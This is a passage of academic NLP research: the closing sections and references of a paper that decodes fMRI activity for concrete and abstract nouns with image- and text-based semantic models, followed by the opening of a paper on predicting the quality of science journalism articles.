(Paivio, 1971) leads to the fol- lowing hypotheses: (1) The text-based models will decode the more abstract nouns’ neural activity pat- terns with higher accuracy than the image-based model; (2) both image and text-based models will decode the more concrete nouns’ neural activity. We also compared the decoding accuracy for the most concrete nouns achieved using the combined image- and text-based models to the unimodal mod- els in isolation. Whilst previous analyses have ob- served advantages of multimodal models in describ- ing concrete noun fMRI, it is not clear whether this effect will carry over to our noun data set. One reason is because many of the most concrete half are “less concrete” than those of previous studies: according to Brysbaert et al. (2014)’s concreteness norms (where words were rated on a scale from 1 to 5), the mean ± SD rating of the 60 concrete nouns analysed by Mitchell et al. (2008) (and subsequently by Anderson et al. (2015)) is 4.87±.12, whereas the mean ± SD of the “most concrete” nouns anal- ysed in the current article, when tested with an inde- pendent samples t-test, was significantly smaller at 4.42±.44 (t = 7.4, p < .0001, 2-tail). A second reason is that the experimental task required par- ticipants to imagine a situation associated with the noun, rather than think of object properties. There- fore this analysis was of a more exploratory nature. 5.2 Decoding Analysis Decoding analyses were run using the image-based model and Italian and English text-based models in isolation, and also all combinations of these models as described in Section 4. Results are in Figure 3. In this section we use the abbreviations Img for the image-based model and TXit and TXen, for the Ital- ian and English text-based models, respectively. In all tests, chance-level decoding accuracy (the expected accuracy if word labelling is random) is 50%. Mean±SE accuracies across all participants are displayed in the leftmost column of plots for all 7 model combinations. Individual-level results are displayed for only three model combinations to avoid cluttering the graphs (Img only, the combined TXit&TXen, and the combined Img&TXit&TXen). To simplify the following discussion of results, we mainly focus on these three models. The choice to focus on TXit&TXen, rather than the Italian model, was made following the rationale that the language combination would leverage cultural nu- ances of semantic structure found in the Italian text- corpora jointly with the more extensive coverage of the larger English Wikipedia. Although TXit&TXen and TXen tended to produce higher decoding accu- racies, there were no significant differences between either TXit or TXen tested in isolation, or any model combination incorporating them. Mean results are displayed for all model combinations in Figure 3 and key results are tabulated in Table 2. 5.3 An advantage for the textual model on abstract nouns With respect to hypothesis 1 (an advantage for the text-based models decoding abstract neural activity patterns), the key difference to observe in Figure 3 is the drop in relative decoding accuracy between the image-based model and text-based models when decoding the most abstract nouns. The nine partic- ipant’s mean decoding accuracies for the most ab- stract nouns were compared between the Img, TXit, TXen and TXit&TXen models using Repeated Mea- sures ANOVA. Combinations of image and text- based models (e.g. Img&TXen) were not directly relevant to this analysis (because they integrate vi- sual and textual data) and consequently these mod- els were excluded. Bartlett’s test was used to verify that there was no evidence against homogeneity of variances prior to analysis (χ2=1.77, p = .62). The ANOVA indicated a statistically significant differ- ence between models: F(3,24) = 5.06, p < .01. Post hoc comparisons conducted using the Tukey Hon- est Significant Difference (HSD) test revealed that decoding accuracies achieved using TXen and the 24 40 50 60 70 80 90 100 Img TXit & TXen Img &TXit & TXen p=.05 40 50 60 70 80 90 100 Img TXit & TXen Img &TXit & TXen p=.05 40 50 60 70 80 90 100 Img TXit & TXen Img &TXit & TXen p=.05 Figure 3: Results of the decoding analysis from Section 5.2. See also Table 2. p=.05 lines were empirically estimated as described in Section 4 and apply to decoding an individual’s fMRI data (not multiple individuals). 25 All words combined Most concrete Most abstract Img 67±3%, 7/9 (<.001) 70±3%, 7/9 (<.001) 58±4%, 2/9 (.07) TXit&TXen 76±5%, 7/9 (<.001) 76±6%, 7/9 (<.001) 68±5%, 6/9 (<.001) Img&TXit&TXen 77±5%, 8/9 (<.001) 77±5%, 8/9 (<.001) 68±5%, 5/9 (<.001) Table 2: Key decoding accuracies from Section 5.2 (see also Figure 3). Each cell shows mean±SE decoding accuracy, the number (n) of participants decoded at a level significantly above chance (p<.05), and in round brackets, the cumulative binomial probability of achieving ≥ n significant results at p=.05. TXit&TXen model were significantly different (and larger than) Img (both p < .05). There were no other significant differences (including between Img and TXit). One possible reason for the weaker perfor- mance of TXit than TXen is that Italian Wikipedia is a less rich source of information due to being smaller in size than English Wikipedia (despite it presum- ably containing semantic information that is more relevant to Italian culture). 5.4 Both image and text-based models decode the more concrete nouns That both image- and text-based models signifi- cantly decoded the most concrete nouns is consis- tent with hypothesis 2. To test for differences be- tween image- and text-based models, mean decod- ing accuracies for the nine participants on the most concrete nouns were compared for the Img, TXit, TXen and TXit&TXen models using Repeated Mea- sures ANOVA. Combinations of image- and text- based models (e.g. Img&TXen) were not directly relevant to this analysis (because they integrate vi- sual and textual data) and so these models were ex- cluded. Bartlett’s test was used to verify homo- geneity of variances prior to analysis (χ2 = 2.86, p = .41). The ANOVA detected no statistically sig- nificant differences between the models: F(3,24) = 1.56, p = .22. Therefore when decoding the most concrete nouns there was no significant difference in accuracy between image-based and any text-based model. 5.5 No overall advantage for multimodal models on the more concrete nouns The third exploratory test compared the accuracy of the multimodal combination of image- and text- based models to the unimodal models when decod- ing the more concrete neural activity patterns. For the most concrete words, the highest scor- ing combination across all models was Img&TXen (mean±SE=77±4%). Whilst this proved to be sig- nificantly greater than Img (t = 3.13, p <= .02, df = 8, 2-tail), it was not significantly greater than TXen (t = .81, p = .44, df = 8, 2-tail). Turning to the analogous case for the Italian models, Img&TXit (mean±SE=75±4%) was not significantly greater than Img (t = 1.74, p = .12, df = 8, 2-tail), or TXit (t = 1.09, p = 0.31, df = 8, 2-tail). Therefore, although multimodal combinations re- turned higher accuracies than either the image- and text-based models in isolation (for concrete words), decoding accuracy was not significantly higher than either image- or text-based models. Previous work decoding neural activity associated with concrete nouns has found image-based mod- els to supply complementary information to text- based models (Anderson et al., 2015). We suggest three reasons that image-based models may have been disadvantaged in the current study compared to these past analyses. Firstly, Anderson et al. fo- cused on fMRI data elicited by unambiguously con- crete nouns, whereas the experimental nouns anal- ysed in the current article were mostly intended to be ‘less than concrete’ (of the seven taxonomic cate- gories investigated only ‘objects/tools’ was designed to be unambiguously concrete). Secondly, Anderson et al. used more images to build noun representa- tions (on average 350 images per noun compared to 20 used here), and nouns in the ImageNet images were segmented according to bounding boxes. Con- sequently their input may have been less noisy than Google Images (which we used because of its wider coverage). Finally, the experimental task of the pre- vious analyses required participants to actively think about the properties of objects, whereas the current data set was elicited as participants imagined situ- 26 ations associated with nouns (and hence may have invoked neural representations with more contextual elements). The lack of a significant increase in decoding ac- curacy achieved by pairing image- and text-based models allows us to infer that the text-based model contained many aspects of the visual semantic struc- ture found in the image-based model. Of course we expect modal structure in text-based models com- mensurate with what people are inclined to report in writing; e.g., it is easy to convey in text that both bananas and lemons are yellow and curvy, and light- bulbs and pears have similar shapes. Therefore we would anticipate correspondences in semantic sim- ilarities between image and text-based models and for these correspondences to extend to match neural similarities, e.g., as induced by participants viewing pictures of objects (Carlson et al., 2014). 5.6 Group-level decoding analysis The similarity-based decoding approach we have ap- plied enables group-level neural representations to be built simply by taking the mean similarity matrix over participants. Values in the correlation matrix were r to z (arctanh) transformed prior to averaging, then the average values were back transformed to the original range using tanh. This was because aver- aging z-transformed values (and back transforming) tends to yield less biased estimates of the population value than averaging the raw coefficients (Silver and Dunlap, 1987). However, in the current analysis re- sults obtained with z-transformation versus without it were virtually identical. Building group-level representations by averag- ing correlation matrices side-steps potential prob- lems surrounding the obvious alternative method of averaging data in fMRI space, where anatom- ical/functional differences between different peo- ples’ brains may result in relatively similar activity patterns being spatially mismatched in the standard- ised fMRI space. The motivation behind building group-level neural representations is that we might expect these to better match the computational se- mantic models than individual-level data. This is because the models are also built at group-level, cre- ated from the photographs and text of many individ- uals. However building group-level neural represen- tations will only be beneficial if there exist group- level commonalities in representational similarity (when combining data will reduce noise) as opposed to individual semantic representational schemes. Accuracies achieved using models to decode the group-level neural similarity matrices are displayed in the final column of the bar charts at the right of Figure 3. Specifically, decoding accuracies were: For all words combined: Img=84.8%, TXit&TXen=96.9% and Img&TXit&TXen=97.3%. For the most concrete words: Img=87.5%, TXit&TXen=95.8% and Img&TXit&TXen=95.8%. For the most abstract words: Img=70.2%, TXit&TXen=85.2% and Img&TXit&TXen=84.8%. To statistically test whether group-level decod- ing accuracies surpassed those of the individual- level results, we compared the set of individual- level mean accuracies to the corresponding group- level mean accuracy using one sample t-tests. In all tests (see Table 3) the individual-level accuracies were significantly different (lower) than the group- level accuracy (corrected for multiple comparisons using false discovery rate (Benjamini and Hochberg, 1995)). This is indicative of group-level regularities in semantic similarity for both concrete and abstract nouns and also their combination. A qualitative observation is that the differences between group and individual-level accuracy appear to be greater for concrete nouns. This could be con- sistent with participants having a more subjective se- mantic representation of abstract nouns; however we did not attempt to statistically test this claim. This is because a meaningful comparison would require concrete and abstract words to be controlled by be- ing at least equally discriminable at individual level and this does not appear to be the case with this dataset. 6 Conclusion This article has demonstrated that neural activity patterns elicited in mental situations of abstract nouns can be decoded using text-based compu- tational semantic models, thus demonstrating that computational semantic models can make a con- tribution to interpreting the semantic structure of neural activity patterns associated with abstract nouns. Furthermore, by comparing how well vi- sually grounded and textual semantic models de- 27 All words combined Most concrete Most abstract Img -5.6 (.004) -5.2 (.004) -3.0 (.02) TXit&TXen -4.2 (.007) -3.6 (.010) -3.4 (.01) Img&TXit&TXen -4.4 (.007) -3.9 (.008) -3.4 (.01) Table 3: Results of one sample t-tests comparing the set of individual-level mean decoding accuracies to the group- level accuracy (see Section 5.6). All tests were 2-tailed with df=8. The first number in each cell is the t-statistic, the second number in round brackets is the p-value (corrected according to false discovery rate). code brain activity associated with concrete or ab- stract nouns, we have observed a selective advan- tage for textual over visual models in decoding the more abstract nouns. This has therefore provided initial model-based brain decoding evidence that is broadly in line with the predictions of dual coding theory (Paivio, 1971). However, results should be interpreted in light of the following two factors. First, the dataset analysed was for a small sample of 67 words, and it is reasonable to conjecture that some of these words are also encoded in modalities other than vision and language. For example, mu- sical words may be encoded in acoustic and motor features (see also Fernandino et al. (2015)). Future work will be necessary to verify that the findings generalise more broadly to words from domains be- yond law and music. In work in progress the authors are undertaking more focused analyses on the cur- rent dataset, using textual, visual and newly devel- oped audio semantic modes (Kiela and Clark, 2015) to tease apart linguistic, visual and acoustic con- tributions to semantic representation and how these vary throughout different regions of the brain. A second limitation of the current approach, as pointed out by a reviewer, is that the Google im- age search algorithm (the workings of which are un- known to the authors) may not perform as well for abstract words as it does for concrete words. Con- sequently, the visual model may have been handi- capped compared to the textual model when decod- ing neural representations associated with more ab- stract words. We have no current measure of the de- gree of this effect, but it may be possible to alleviate it in future work, by having participants manually select images that they associate with abstract stim- ulus words, and using computational representations derived from these images in the analysis. Secondary results are that we have exploited rep- resentational similarity space to build group-level neural representations which better match our inher- ently group-level computational semantic models. In so doing, this exposes group-level commonalities in neural representation for both concrete and ab- stract words. Such group-level representations may prove both a useful test-bed for evaluating compu- tational semantic models, as well as a potentially useful information source to incorporate into com- putational models (see Fyshe et al. (2014) for related work). Finally we have demonstrated that English and Italian text-based models are roughly interchange- able in our neural decoding task. That the En- glish text-based model tended to return marginally higher results on our Italian brain data than the Ital- ian model provides a cautionary note for future stud- ies wishing to use semantic models from different languages to identify culturally specific aspects of neural semantic representation e.g., as a follow up to Zinszer et al. (2016). However we also note that the English Wikipedia data was larger than the cor- responding Italian corpus. Acknowledgments We thank three anonymous reviewers for their in- sightful comments and suggestions, Brian Murphy for his involvement in the configuration, collection and preprocessing of the original dataset, and Marco Baroni and Elia Bruni for early conversations on some of the ideas presented. Stephen Clark is sup- ported by ERC Starting Grant DisCoTex (306920). References A. J. Anderson, E. Bruni, U. Bordignon, M. Poesio, and M. Baroni. 2013. Of words, eyes and brains: Correlat- ing image-based distributional semantic models with 28 neural representations of concepts. In Proceedings of EMNLP, pages 1960–1970, Seattle, WA. A. J. Anderson, B. Murphy, and M. Poesio. 2014. Discriminating taxonomic categories and domains in mental simulations of concepts of varying concrete- ness. J. Cognitive Neuroscience, 26(3):658–681. A. J. Anderson, E. Bruni, A. Lopopolo, M. Poesio, and M. Baroni. 2015. Reading visually embodied mean- ing from the brain: Visually grounded computational models decode visual-object mental imagery induced by written text. NeuroImage, 120:309–322. A. J. Anderson, B. D Zinszer, and R. D. S. Raizada. 2016. Representational similarity encoding for fMRI: Pattern-based synthesis to predict brain activity using stimulus-model-similarities. NeuroImage, 128:44–53. M. Andrews, G. Vigliocco, and D. Vinson. 2009. In- tegrating experiential and distributional data to learn semantic representations. Psychological Review, 116(3):463–498. L. Barca, C. Burani, and L. S. Arduino. 2002. Word naming times and psycholinguistic norms for Italian nouns. Behavior Research Methods, Instruments, & Computers, 34:424–434. Y. Benjamini and Y. Hochberg. 1995. Controlling the false discovery rate: A practical and powerful ap- proach to multiple testing. Journal of the Royal Sta- tistical Society, Series B (Methodological), 57(1):289– 300. L. Bentivogli, P. Forner, B. Magnini, and E. Pianta. 2004. Revising the WordNet Domains Hierarchy: Seman- tics, coverage, and balancing. In Proceedings of the Workshop on Multilingual Linguistic Resources, pages 101–108, Geneva, Switzerland. S. Bergsma and B. Van Durme. 2011. Learning bilingual lexicons using the visual similarity of labeled web im- ages. In IJCAI, pages 1764–1769. R. Bruffaerts, P. Dupont, R. Peeters, S. De Deyne, G. Storms, and R. Vandenberghe. 2013. Similar- ity of fMRI activity patterns in left perirhinal cortex reflects similarity between words. J. Neuroscience, 33(47):18597–18607. E. Bruni, N. K. Tran, and M. Baroni. 2014. Multimodal distributional semantics. Journal of Artifical Intelli- gence Research, 49:1–47. M. Brysbaert, A. B. Warriner, and V. Kuperman. 2014. Concreteness ratings for 40 thousand generally known English word lemmas. Behavior research methods, 46(3):904–911. T. A. Carlson, R.A. Simmons, and N. Kriegeskorte. 2014. The emergence of semantic meaning in the ventral temporal pathway. J. Cognitive Neuroscience, 26(1):120–131. K. M. Chang, T. M. Mitchell, and M. A. Just. 2010. Quantitative modeling of the neural representations of objects: How semantic feature norms can account for fMRI activation. NeuroImage: Special Issue on Mul- tivariate Decoding and Brain Reading, 56:716–727. K. Darwish. 2013. Named entity recognition using cross-lingual resources: Arabic as an example. In Proc. ACL, pages 1558–1567. B. Devereux, C. Kelly, and A. Korhonen. 2010. Us- ing fMRI activation to conceptual stimuli to evalu- ate methods for extracting conceptual representations from corpora. In Proceedings of the NAACL HLT First Workshop on Computational Neurolinguistics, pages 70–78, Los Angeles, USA. C. Fellbaum, editor. 1998. WordNet: An Electronic Database. MIT Press, Cambridge, MA. R. Fergus, L. Fei-Fei, P. Perona, and A. Zisserman. 2005. Learning object categories from Google’s im- age search. In ICCV, pages 1816–1823. L. Fernandino, C. J. Humphries, M. S. Seidenberg, W. L. Gross, L. L. Conant, and J. R. Binder. 2015. Prediction of brain activation patterns as- sociated with individual lexical concepts based on five sensory-motor attributes. Neuropsycholigia. doi:10.1016/j.neuropsychologia.2015.04.009. A. Fyshe, P. P. Talukdar, B. Murphy, and T. M. Mitchell. 2014. Interpretable semantic vectors from a joint model of brain-and text-based meaning. In Proceed- ings of ACL, pages 489–499, Baltimore, MD. Y. Jia, E. Shelhamer, J. Donahue, S. Karayev, J. Long, R. B. Girshick, S. Guadarrama, and T. Darrell. 2014. Caffe: Convolutional architecture for fast feature em- bedding. In ACM Multimedia, pages 675–678. D. Kiela and L. Bottou. 2014. Learning image em- beddings using convolutional neural networks for im- proved multi-modal semantics. In Proceedings of EMNLP, pages 36–45, Doha, Qatar. D. Kiela and S. Clark. 2015. Multi- and cross-modal semantics beyond vision: Grounding in auditory per- ception. In Proceedings of the Empirical Methods in Natural Language Processing Conference (EMNLP 2015), pages 2461–2470, Lisbon, Portugal. D. Kiela, F. Hill, A. Korhonen, and S. Clark. 2014. Im- proving multi-modal representations using image dis- persion: Why less is sometimes more. In Proceedings of ACL 2014. N. Kriegeskorte, W. K. Simmons, P. S. F. Bellgowan, and C. I. Baker. 2009. Circular analysis in systems neuro- science: The dangers of double dipping. Nature Neu- roscience, 12:535–540. N. Kriegeskorte. 2015. Deep neural networks: A new framework for modeling biological vision and brain information processing. Annual Review of Vision Sci- ence, 1:417–446. 29 T. Mikolov, K. Chen, G. Corrado, and J. Dean. 2013. Efficient estimation of word representations in vector space. In Proceedings of ICLR, Scottsdale, Arizona, USA. T. M. Mitchell, S. V. Shinkareva, A. Carlson, K.-M. Chang, V. L. Malave, R. A. Mason, and M. A. Just. 2008. Predicting human brain activity associated with the meaning of nouns. Science, 320:1191–1195. B. Murphy, P. Talukdar, and T. Mitchell. 2012. Selecting corpus-semantic models for neurolinguistic decoding. In Proceedings of the First Joint Conference on Lexi- cal and Computational Semantics (*SEM), pages 114– 123, Montreal, Canada. A Paivio, editor. 1971. Imagery and verbal processes. Holt, Rinehart, and Winston, New York. M. Palatucci, D. Pomerleau, G. Hinton, and T. Mitchell. 2009. Zero-shot learning with semantic output codes. Neural Information Processing Systems, 22:1410– 1418. F. Pereira, M. Botvinick, and G. Detre. 2013. Using Wikipedia to learn semantic feature representations of concrete concepts in neuroimaging experiments. Artif. Intell., 194:240–252. A. S. Razavian, H. Azizpour, J. Sullivan, and S. Carls- son. 2014. CNN features off-the-shelf: An astound- ing baseline for recognition. In IEEE Conference on Computer Vision and Pattern Recognition Workshops 2014, pages 512–519. A. E. Richman and P. Schone. 2008. Mining wiki re- sources for multilingual named entity recognition. In Proc. ACL. L. Shi, R. Mihalcea, and M. Tian. 2010. Cross- language text classification by model translation and semi-supervised learning. In Proc. EMNLP. N. C. Silver and W. P. Dunlap. 1987. Averaging correla- tion coefficients: Should Fisher’s z transformation be used? J. Applied Psychology, 72(1):146–148. J. Sivic and A. Zisserman. 2003. Video google: A text retrieval approach to object matching in videos. In ICCV, pages 1470–1477. G. Sudre, D. Pomerleau, M. Palatucci, L. Wehbe, A. Fyshe, R. Salmelin, and T. Mitchell. 2012. Track- ing neural coding of perceptual and semantic features of concrete nouns. NeuroImage, 62:451–463. K. Wiemer-Hastings and X. Xu. 2005. Content differ- ences for abstract and concrete concepts. Cognitive Science, 29:719–736. B. D. Zinszer, A. J. Anderson, O. Kang, T. Wheatley, and R. D. S. Raizada. 2016. Semantic structural align- ment of neural representational spaces enables transla- tion between English and Chinese words. J. Cognitive Neuroscience, 28(11):1749–1759. 30 work_hea3gijzhnc2rl4sxgyj6pvghm ---- What Makes Writing Great? First Experiments on Article Quality Prediction in the Science Journalism Domain Annie Louis University of Pennsylvania Philadelphia, PA 19104 lannie@seas.upenn.edu Ani Nenkova University of Pennsylvania Philadelphia, PA 19104 nenkova@seas.upenn.edu Abstract Great writing is rare and highly admired. Readers seek out articles that are beautifully written, informative and entertaining. Yet information-access technologies lack capabil- ities for predicting article quality at this level. In this paper we present first experiments on article quality prediction in the science jour- nalism domain. We introduce a corpus of great pieces of science journalism, along with typical articles from the genre. We imple- ment features to capture aspects of great writ- ing, including surprising, visual and emotional content, as well as general features related to discourse organization and sentence structure. We show that the distinction between great and typical articles can be detected fairly ac- curately, and that the entire spectrum of our features contribute to the distinction. 1 Introduction Measures of article quality would be hugely bene- ficial for information retrieval and recommendation systems. In this paper, we describe a dataset of New York Times science journalism articles which we have categorized for quality differences and present a system that can automatically make the distinction. Science journalism conveys complex scientific ideas, entertaining and educating at the same time. Consider the following opening of a 2005 article by David Quammen from Harper’s magazine: One morning early last winter a small item appeared in my local newspaper announcing the birth of an extraordi- nary animal. A team of researchers at Texas A&M Uni- versity had succeeded in cloning a whitetail deer. Never done before. The fawn, known as Dewey, was developing normally and seemed to be healthy. He had no mother, just a surrogate who had carried his fetus to term. He had no father, just a “donor” of all his chromosomes. He was the genetic duplicate of a certain trophy buck out of south Texas whose skin cells had been cultured in a laboratory. One of those cells furnished a nucleus that, transplanted and rejiggered, became the DNA core of an egg cell, which became an embryo, which in time be- came Dewey. So he was wildlife, in a sense, and in an- other sense elaborately synthetic. This is the sort of news, quirky but epochal, that can cause a person with a mouth- ful of toast to pause and marvel. What a dumb idea, I marveled. The writing is clear and well-organized but the text also contains creative use of language and a clever story-like explanation of the scientific con- tribution. Such properties make science journalism an attractive genre for studying writing quality. Sci- ence journalism is also a highly relevant domain for information retrieval in the context of educational as well as entertaining applications. Article quality measures can hugely benefit such systems. Prior work indicates that three aspects of article quality can be successfully predicted: a) whether a text meets the acceptable standards for spelling (Brill and Moore, 2000), grammar (Tetreault and Chodorow, 2008; Rozovskaya and Roth, 2010) and discourse organization (Barzilay et al., 2002; Lap- ata, 2003); b) has a topic that is interesting to a par- ticular user. For example, content-based recommen- dation systems standardly represent user interest us- ing frequent words from articles in a user’s history and retrieve other articles on the same topics (Paz- 341 Transactions of the Association for Computational Linguistics, 1 (2013) 341–352. Action Editor: Mirella Lapata. Submitted 12/2012; Revised 3/2013, 5/2013; Published 7/2013. c©2013 Association for Computational Linguistics. zani et al., 1996; Mooney and Roy, 2000); and c) is easy to read for a target readership. Shorter words (Flesch, 1948), less complex syntax (Schwarm and Ostendorf, 2005) and high cohesion between sen- tences (Graesser et al., 2004) typically indicate eas- ier and more ‘readable’ articles. Less understood is the question of what makes an article interesting and beautifully written. An early and influential work on readability (Flesch, 1948) also computed an interest measure with the hypoth- esis that interesting articles would be easier to read. More recently, McIntyre and Lapata (2009) found that people’s ratings of interest for fairy tales can be successfully predicted using token-level scores re- lated to syntactic items and categories from a psy- cholinguistic database. But large scale studies of in- terest measures for adult educated readers have not been carried out. Further, there have been little attempts to measure article quality in a genre-specific setting. But it is reasonable to expect that properties related to the unique aspects of a genre should contribute to the prediction of quality in the same way that domain- specific spelling and grammar correction (Cucerzan and Brill, 2004; Bao et al., 2011; Dale and Kilgar- riff, 2010) techniques have been successful. Here we address the above two issues by develop- ing measures related to interesting and well-written nature specifically for science journalism. Central to our work is a corpus of science news articles with two categories: written by popular journalists and typical articles in science columns (Section 2). We introduce a set of genre-specific features related to beautiful writing, visual nature and affective content (Section 3) and show that they have high predictive accuracies, 20% above the baseline, for distinguish- ing our quality categories (Section 4). Our final sys- tem combines the measures for interest and genre- specific features with those proposed for identifying readable, well-written and topically interesting arti- cles, giving an accuracy of 84% (Section 5). 2 Article quality corpus Our corpus1 contains chosen articles from the larger New York Times (NYT) corpus (Sandhaus, 2008), the latter containing a wealth of metadata about each 1Available from http://www.cis.upenn.edu/ ˜nlp/corpora/scinewscorpus.html article including author information and manually assigned topic tags. 2.1 General corpus The articles in the VERY GOOD category include all contributions to the NYT by authors whose writing appeared in “The Best American Science Writing” anthology published annually since 1999. Articles from the science columns of leading newspapers are nominated and expert journalists choose a set they consider exceptional to appear in these anthologies. There are 63 NYT articles in the anthology (between years 1999 and 2007) that are also part of the digital NYT corpus; these articles form the seed set of the VERY GOOD category. We further include in the VERY GOOD category all other science articles contributed to NYT by the authors of the seed examples. Science articles by other authors not in our seed set form the TYPICAL category. We perform this expansion by first creat- ing a relevant set of science articles. There is no single meta-data tag in the NYT which refers to all the science articles. So we use the topic tags from the seed articles as an initial set of research tags. We then compute the minimal set of research tags that cover all best articles. We greedily add tags into the minimal set, at each iteration choosing the tag that is present in the majority of articles that re- main uncovered. This minimal set contains 14 tags such as ‘Medicine and Health’, ‘Space’, ‘Research’, ‘Physics’ and ‘Evolution’. We collect articles from the NYT which have at least one of the minimal set tags. However, even a cursory mention of a research topic results in a research-related tag being assigned to the article. So we also use a dictionary of research-related terms to determine whether the article passes a minimum threshold for research content. We created this dic- tionary manually and it contains the following words and their morphological variants (total 63 items). We used our intuition about a few categories of re- search words to create this list. The category is shown in capital letters below. PEOPLE: researcher, scientist, physicist, biologist, economist, anthropologist, environmentalist, linguist, professor, dr, student PROCESS: discover, found, experiment, work, finding, study, question, project, discuss TOPIC: biology, physics, chemistry, anthropology, primatology 342 PUBLICATIONS: report, published, journal, paper, author, issue OTHER: human, science, research, knowledge, university, lab- oratory, lab ENDINGS: -ology -gist, -list, -mist, -uist, -phy The items in the ENDINGS category are used to match word suffixes. An article is considered science-related if at least 10 of its tokens match the dictionary and in addition, at least 5 unique words from the dictionary are matched. Since the time span of the best articles is 1999 to 2007, we limit our col- lection to this timespan. In addition, we only con- sider articles that are at least 500 words long. This filtered set of 23,709 articles form the relevant set of science journalism. The 63 seed samples of great writing were con- tributed by about 40 authors. Some authors have multiple articles selected for the best writing book series, supporting the idea that these authors produce high quality pieces that can be considered distinct from typical articles. Separating the articles from these authors gives us 3,467 extra samples of VERY GOOD writing. In total, the VERY GOOD set has 3,530 articles. The remaining articles from the rele- vant set, 20,242, written by about 3000 other authors form the TYPICAL category. 2.2 Topic-paired corpus The general corpus of science writing introduced so far contains articles on diverse topics including bi- ology, astronomy, religion and sports. The VERY GOOD and TYPICAL categories created above al- low us to study writing quality without regard to topic. However a typical information retrieval sce- nario would involve comparison between articles of the same topic, i.e. relevant to the same query. To investigate how quality differentiation can be done within topics, we created another corpus where we paired articles of VERY GOOD and TYPICAL quality. For each article in the VERY GOOD category, we compute similarity with all articles in the TYPICAL set. This similarity is computed by comparing the topic words (computed using a loglikelihood ratio test (Lin and Hovy, 2000)) of the two articles. We retain the most similar 10 TYPICAL articles for each VERY GOOD article. We enumerate all pairs of VERY GOOD with matched up TYPICAL ARTICLES (10 in number) giving a total of 35,300 pairs. There are two distinguishing aspects of our cor- pus. First, the average quality of articles is high. They are unlikely to have spelling, grammar and ba- sic organization problems allowing us to investigate article quality rather than the detection of errors. Second, our corpus contains more realistic samples of quality differences for IR or article recommen- dation compared to prior work, where system pro- duced texts and permuted versions of an original ar- ticle were used as proxies for lower quality text. 2.3 Tasks We perform two types of classification tasks. We divide our corpus into development and test sets for these tasks in the following way. Any topic: Here the goal is to separate out VERY GOOD versus TYPICAL articles without regard to topic. The setting roughly corresponds to picking out an interesting article from an archive or a day’s newspaper. The test set contains 3,430 VERY GOOD articles and we randomly sample 3,430 articles from the TYPICAL category to comprise the negative set. Same topic: Here we use the topic-paired VERY GOOD and TYPICAL articles. The goal is to predict which article in the pair is the VERY GOOD one. This task is closer to a information retrieval setting, where articles similar in topic (retrieved for a user query) need to be distinguished for quality. For test set, we selected 34,300 pairs. Development data: We randomly selected 100 VERY GOOD articles and their paired (10 each) TYPICAL articles from the topic-normalized corpus. Overall, these constitute 1,000 pairs which we use for developing the same-topic classifier. From these selected pairs we take the 100 VERY GOOD articles and sample 100 unique articles from the TYPICAL articles making up the pairs. These 200 articles are used to tune the any-topic classifier. 3 Facets of science writing In this section, we discuss six prominent facets of science writing which we hypothesized will have an impact on text quality. These are the presence of passages of highly visual nature, people-oriented content, use of beautiful language, sub-genres, sen- timent or affect, and the depth of research descrip- tion. Several other properties of science writing could also be relevant to quality such as the use of 343 humor, metaphor, suspense and clarity of explana- tions and we plan to explore these in future work. We describe how we computed features related to each property and tested how these features are dis- tributed in the VERY GOOD and TYPICAL categories. To do this analysis, we randomly sampled 1,000 ar- ticles from each of the two categories as representa- tive examples. We compute the value of each feature on these articles and use a two-sided t-test to check if the mean value of the feature is higher in one class of articles. A p-value less than 0.05 is taken to in- dicate significantly different trend for the feature in the VERY GOOD versus TYPICAL articles. Note that our feature computation step is not tuned for the quality prediction task in any way. Rather we aim to represent each facet as accurately as possible. Ideally we would require manual anno- tations for each facet (visual, sentiment nature etc.) to achieve this goal. At this time, we simply check some chosen features’ values on a random collection of snippets from our corpus and check if they behave as intended without resorting to these annotations. 3.1 Visual nature of articles Some texts create an image in the reader’s mind. For example, the snippet below has a high visual effect. When the sea lions approached close, seemingly as curious about us as we were about them, their big brown eyes were encircled by light fur that looked like makeup. One sea lion played with a conch shell as if it were a ball. Such vivid descriptions can engage and entertain a reader. Kosslyn (1980) found that people spon- taneously form images of concrete words that they hear and use them to answer questions or perform other tasks. Books written for student science jour- nalists (Blum et al., 2006; Stocking, 2010) also em- phasize the importance of visual descriptions. We measure the visual nature of a text by count- ing the number of visual words. Currently, the only resource of imagery ratings for words is the MRC psycholinguistic database (Wilson, 1988). It con- tains a list of 3,394 words rated for their ability to invoke an image, so the list contains both words that are highly visual along with words that are not visual at all. With a cutoff value we adopted, of 4.5 for the Gilhooly-Logie and 350 for the Bristol Norms2 we 2The visual words resource in MRC contains two lists— obtain 1,966 visual words. So the coverage of that lexicon is likely to be low for our corpus. We collect a larger set of visual words from a cor- pus of tagged images from the ESP game (von Ahn and Dabbish, 2004). The corpus contains 83,904 total images and 27,466 unique tags. The average number of tags per picture is 14.5. The tags were collected in a game setting where two users individ- ually saw the same image and had to guess words related to it. The players increased their scores when the word guessed by one player matched that of the other. Due to the simple annotation method, there is considerable noise and non-visual words assigned as tags. So we performed filtering to find high pre- cision image words and also group them into topics. We use Latent Dirichlet Allocation (Blei et al., 2003) to cluster image tags into topics. We treat each picture as a document and the tags assigned to the picture are the document’s contents. We use sym- metric priors set to 0.01 for both topic mixture and word distribution within each topic. We filter out the 30 most common words in the corpus, words that ap- pear in less than four pictures and images with fewer than five tags. The remaining words are clustered into 100 topics with the Stanford Topic Modeling Toolbox3 (Ramage et al., 2009). We did not tune the number of topics and choose the value of 100 based on the intuition that the number of visual topics is likely to be small. To select clean visual clusters, we make the as- sumption that visual words are likely to be clustered with other visual terms. Topics that are not visual are discarded altogether. We use the manual an- notations available with the MRC database to de- termine which clusters are visual. For each of the 100 topics from the topic model, we examine the top 200 words with highest probability in that topic. We compute the precision of each topic as the pro- portion of these 200 words that match the MRC list of visual words (1,966 words using the cutoff men- tioned above). Only those topics which had a pre- cision of at least 25% were retained, resulting in 68 visual topics. Some example topics, with manually created headings, include: landscape. grass, mountain, green, hill, blue, field, brown, sand, desert, dirt, landscape, sky Gilhooly-Logie and Bristol Norms. 3http://nlp.stanford.edu/software/tmt/tmt-0.4/ 344 jewellery. silver, white, diamond, gold, necklace, chain, ring, jewel, wedding, diamonds, jewelry shapes. round, ball, circles, logo, dots, square, dot, sphere, glass, hole, oval, circle Combining these 68 topics, there are 5,347 unique visual words because topics can overlap in the list of most probable words. 2,832 words from this set are not present in the MRC database. Some examples of new words in our list are ‘daffodil’, ‘sailor’, ‘hel- met’, ‘postcard’, ‘sticker’, ‘carousel’, ‘kayak’, and ‘camouflage’. For later experiments we consider the 5,347 words as the visual word set and also keep the information about the top 200 words in the 68 selected topics. We compute two classes of features one based 